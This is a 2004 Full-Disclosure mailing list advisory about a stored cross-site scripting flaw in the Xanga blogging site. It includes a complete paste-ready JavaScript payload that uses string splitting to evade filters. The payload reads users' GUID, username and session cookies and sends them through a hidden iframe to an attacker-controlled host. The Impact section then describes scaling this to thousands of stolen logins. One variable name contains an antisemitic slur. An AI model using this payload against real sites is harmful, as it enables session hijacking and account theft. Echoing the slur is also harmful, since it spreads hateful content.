Vendor: Xanga
URL: http://www.xanga.com/
Versions: Current
Remote: Yes
vendor notified: 06 Oct 2004 at 14:08
Vendor response: NONE


Summary:
~~~~~~~
Xanga is a fully featured blogging system, it 
provides great control over look & feel of a users 
blog by allowing HTML with only basic checks.
Xanga has well over 100,000 users and millions
of page views every hour.
A security vulnerability in the current system
allows malicious users to steal session cookies
===================================

Examples Code:
~~~~~~~~~~~~~~~~~~~~~~~~
Pre-reqs:
* Create an Account, this does not require a valid email.

1. Click Look & Feel on the lefthand navigation bar
2. In the "Insert your own HTML" Box enter for following code.
~~~~~~~~~~~~CUT AFTER HERE~~~~~~~~~~~~~~~~~
<script>
var gt = "<";
var e1 = "scr";
var e2 = "ipt";
var lt = ">";
var if1 = "ifr";
var if2 = "ame";
document.write(gt + e1 + e2 + lt);
document.write("var jewsdidwtc = documen");
document.write("t.cook");
document.write("ie.split(\';\');");
document.write("<\/script>");
// WRITE COOKIE TO TOP OF SCREEN.
document.write(jewsdidwtc);
var quot = '"'
// THE FOLLOWING CODE DEMONSTRATES HOW
// TO STEAL THE COOKIE, "SOMESITE" SHOULD 
// BE A SITE WHERE YOU CAN TAIL THE LOGS
// OR MAYBE WRITE A SPECIFIC SCRIPT TO 
// CAPTURE THE ARGUMENTS PROVIDED

var url = "http://SOMEWEBSITE/";
document.write(gt + if1 + if2);

document.write(" src=" + url + "?guid=");
// --- get guid --- 
var GUID = "GUID=";
for(var i=0;i < jewsdidwtc.length;i++)
{
var c = jewsdidwtc[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(GUID) == 0) var GUIDval = c.substring(GUID.length,c.length);
}
// --- get username --- 
var USER = "u=";
for(var i=0;i < jewsdidwtc.length;i++)
{
var c = jewsdidwtc[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(USER) == 0) var USERval = c.substring(USER.length,c.length);
}
// --- get sessionid --- 
var SESS = "x=";
for(var i=0;i < jewsdidwtc.length;i++)
{
var c = jewsdidwtc[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(SESS) == 0) var SESSval = c.substring(SESS.length,c.length);
}
document.write(GUIDval);
document.write("&u=" + USERval);
document.write("&x=" + SESSval);
document.write(quot);
document.write(" WIDTH=1 HEIGHT=1" + lt);

</script>
~~~~~~~~~~~~END CUT HERE~~~~~~~~~~~~~~~~~
=========================================

Impact:
~~~~~
This code just shows how to steal session cookies, it would 
seem that getting hits to a malicious users blog could be quite 
hard. This is not the case. When combined with existing Xanga 
exploits: 1. http://homepage.ntlworld.com/allencastro/autoreg.gnaa
             2. http://homepage.ntlworld.com/allencastro/xanga.gnaa
could potentially generate thousands of hits and even become
featured on Xanga's front page (due to popularity of page).
Meaning the attacker could get thousands of logins in a
few hours.

Vendor:
~~~~~
Vendor was informed months ago but we have recieved no reply.

Credits:
~~~~~
K5 Article on Xanga: http://www.kuro5hin.org/story/2004/12/28/161214/43
The GNAA Security Team: http://www.gnaa.us/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html